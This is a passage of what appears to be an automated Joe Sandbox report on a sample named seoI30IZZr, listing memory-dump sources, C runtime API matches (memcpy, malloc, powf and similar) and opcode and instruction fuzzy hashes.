                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                                                        • String ID: %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                        • API String ID: 3056473165-830562872
                                                                                                                                                                        • Opcode ID: 681f3d780f0ef6974c41a4a31700af1003b88c4f32cfd03c12d26a70ca9d8da7
                                                                                                                                                                        • Instruction ID: bff4a2e7d6cfc49f06651ffbfd49054501f2bd4b79da86e2370e6a766fcec3ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 681f3d780f0ef6974c41a4a31700af1003b88c4f32cfd03c12d26a70ca9d8da7
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E32D536B086C5ABEB09DB36CA402E9B3A1FF59344F548735DB2857291DB38F860CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: mallocmemcpy$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 798594229-0
                                                                                                                                                                        • Opcode ID: bc8a45b6411aaf55af11a5d79b17b838c4c1552f80796056bca3cf68135ad035
                                                                                                                                                                        • Instruction ID: 992cfc0600276b9c64a6be375f377fd77dd57b0cc7e90e44c9a4208c796ec492
                                                                                                                                                                        • Opcode Fuzzy Hash: bc8a45b6411aaf55af11a5d79b17b838c4c1552f80796056bca3cf68135ad035
                                                                                                                                                                        • Instruction Fuzzy Hash: A141D6726097C286EB40DF65E9411B9B3A1FB84B94F685236DE4D87789DF3CD841C720
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 57aea55b4c2260e0483cf07a78bd6de75e042f1f93d924f17514c3f8d6bf104d
                                                                                                                                                                        • Instruction ID: 127ca0815d074983d8138f60296f4350c210ab1fdf6c3d0e50cecd54e97bd5d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 57aea55b4c2260e0483cf07a78bd6de75e042f1f93d924f17514c3f8d6bf104d
                                                                                                                                                                        • Instruction Fuzzy Hash: F2E12732F086D995E213B737A8421BAF391BF6E384F688732ED4876161DF297C91C911
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 5d9c23052e32490d5e9f1eff749d4997c8176e569aae3ab7ab84b95663f41b9b
                                                                                                                                                                        • Instruction ID: 380b52bf11a38494fab5519960e00140194639ec3ea93b98006423c02756fdb7
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9c23052e32490d5e9f1eff749d4997c8176e569aae3ab7ab84b95663f41b9b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE1F522E08ACD95E253B63758421FAE351BF6E384F698B32ED48311B5DB397981CE11
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 913ee08830a84e6ace97ef18f8c4bee6a5c7b69069a0cf085aeb0279c4cb7da6
                                                                                                                                                                        • Instruction ID: 9cf87d1cc4f9aa422233dab0b2cdc57a898991c3541f8fc26da4c389aac94895
                                                                                                                                                                        • Opcode Fuzzy Hash: 913ee08830a84e6ace97ef18f8c4bee6a5c7b69069a0cf085aeb0279c4cb7da6
                                                                                                                                                                        • Instruction Fuzzy Hash: BBE10822E0CAC955E663B63658022F7F351BF6F385F688732ED48751B2DF293981CA10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
                                                                                                                                                                        • Instruction ID: 1320c4351d89ed306d9ba380a546bf8fa5f93d0b0b9c4f6a027d3f05cd723436
                                                                                                                                                                        • Opcode Fuzzy Hash: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A114435B0A6C2A5FE59AB90DC1073AA2A0FF45F41FA89135C80D97260DF2CA805CBA0
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memchr
                                                                                                                                                                        • String ID: %*s%.*s$ %.*s$--------------------------------
                                                                                                                                                                        • API String ID: 3297308162-2326682469
                                                                                                                                                                        • Opcode ID: ff8021ae17d2e8957d69c99410b60825955446000d19f429f786a3e29013ea22
                                                                                                                                                                        • Instruction ID: f6b4e2719089449de6f972fec03718aa4df04236b69eb99f7bcc36a2e20dffa7
                                                                                                                                                                        • Opcode Fuzzy Hash: ff8021ae17d2e8957d69c99410b60825955446000d19f429f786a3e29013ea22
                                                                                                                                                                        • Instruction Fuzzy Hash: FDE1D132E04AC695E711EB35D8047EEB361FF19388F659332DA4877295EF38A885CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2138705365-0
                                                                                                                                                                        • Opcode ID: 9be24f6db715e1d39b030f97d5cb8fe78395b157149ac0233fed0782b7188fb7
                                                                                                                                                                        • Instruction ID: a28dab30f2c8855c71b14577ef579e961779b340f38f9afc6383927a2f171eaa
                                                                                                                                                                        • Opcode Fuzzy Hash: 9be24f6db715e1d39b030f97d5cb8fe78395b157149ac0233fed0782b7188fb7
                                                                                                                                                                        • Instruction Fuzzy Hash: A28190B2B04AC1A1EB04EF29D94436EA766FB04B88FA04032D74D07669EF78DDC5C750
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ceilffloorf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 300201839-0
                                                                                                                                                                        • Opcode ID: a0d0ff3d0fae75cab1a7ad58267d504a2da36a7ee6d947db0c903cf86cc6fcdc
                                                                                                                                                                        • Instruction ID: 2598b15cd0980f61af9f16d9964b9465075acf7b2512f14d110b4c191bfd0515
                                                                                                                                                                        • Opcode Fuzzy Hash: a0d0ff3d0fae75cab1a7ad58267d504a2da36a7ee6d947db0c903cf86cc6fcdc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B51FC33A1CBC145D3629F3194413BAF7A1BF69381F658332EAC866655EB3DD891CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B513
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B566
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B570
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B5BC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: 1e51fdf01d76f39846ea8631ad2725d32a691cd3e5675770bc95c25aebbb1d81
                                                                                                                                                                        • Instruction ID: 3d2f3f34697bce6ba538466c8d2df838b3a8c3255d617338b185c52074156b12
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e51fdf01d76f39846ea8631ad2725d32a691cd3e5675770bc95c25aebbb1d81
                                                                                                                                                                        • Instruction Fuzzy Hash: F241A271B04A81A1EA14EB15E94416EA393FB44BE8FE80731DA7D07BD9EE3CE841C711
                                                                                                                                                                        APIs
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BEA1
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BEB4
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BF27
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662BF34
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: f6a8c7abaea74e2c99d9ddab3c56c85c386e53f3ad6ac37b94ac2cd5e52858e4
                                                                                                                                                                        • Instruction ID: 954bcbd45b6859f583f2c3888d4724de61461c5c5d51c7366b338cd74111c047
                                                                                                                                                                        • Opcode Fuzzy Hash: f6a8c7abaea74e2c99d9ddab3c56c85c386e53f3ad6ac37b94ac2cd5e52858e4
                                                                                                                                                                        • Instruction Fuzzy Hash: B741F622714AC5A1EA14EB25D8041BEA363FB48BE4FA84635DBAD07BD5CF3CD881C711
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1155477157-0
                                                                                                                                                                        • Opcode ID: d11a557a0e569d27a6933a7b3627209942809bd707071fcc7ea5f756d4b35c05
                                                                                                                                                                        • Instruction ID: ede17d4a667450c9b1ee3780b56e1c43484ebd755770425867c9b7e3e4dab2c3
                                                                                                                                                                        • Opcode Fuzzy Hash: d11a557a0e569d27a6933a7b3627209942809bd707071fcc7ea5f756d4b35c05
                                                                                                                                                                        • Instruction Fuzzy Hash: F431E362B096C5A8FB55BB12AD003BB9253BB44FE8FA40231DA2C077C5DE7CE881C751
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: 0ceff8995869bf13223ddd3ef330eef13108ed78b29c66e720f296adefcf47d2
                                                                                                                                                                        • Instruction ID: a926f73e6a489636a88375fe179fc061a42372d4b1ff71edec55bbb0f6a7fb75
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ceff8995869bf13223ddd3ef330eef13108ed78b29c66e720f296adefcf47d2
                                                                                                                                                                        • Instruction Fuzzy Hash: D331D461B097C1A4EF10AF16A94436AE253FB04BD8FA84231DE5D0BBD5DE7CE881C721
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 84d244ba0fd788321ac0c73d4124b7838d749fc27fa08525ec64a6da94c3c0bf
                                                                                                                                                                        • Instruction ID: 5bf7fc43cfc8223ba0e3861fbb793b96892e5a2fe727eb3b3444beafa12880b6
                                                                                                                                                                        • Opcode Fuzzy Hash: 84d244ba0fd788321ac0c73d4124b7838d749fc27fa08525ec64a6da94c3c0bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B518732708B81D5DB509F69D85036EB3A6FB84B94FA44236DA5D47798DF3CC848CB11
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: 077956a081d7893dd110ada6ad75908bd3227dad2f37f2570ffc20078c418672
                                                                                                                                                                        • Instruction ID: 22861b2c939666aff6e9885ac6e8cefaa52acba3ceba205bec5c3428a022de3c
                                                                                                                                                                        • Opcode Fuzzy Hash: 077956a081d7893dd110ada6ad75908bd3227dad2f37f2570ffc20078c418672
                                                                                                                                                                        • Instruction Fuzzy Hash: BC31D222B057C255EB156B65AD403BAA153AB14BE8F780631DE2C077D6DE3899C3C721
                                                                                                                                                                        APIs
                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,00007FF786612701), ref: 00007FF78662973A
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF786612701), ref: 00007FF7866297C0
                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,00007FF786612701), ref: 00007FF7866297E6
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662980A
                                                                                                                                                                          • Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE
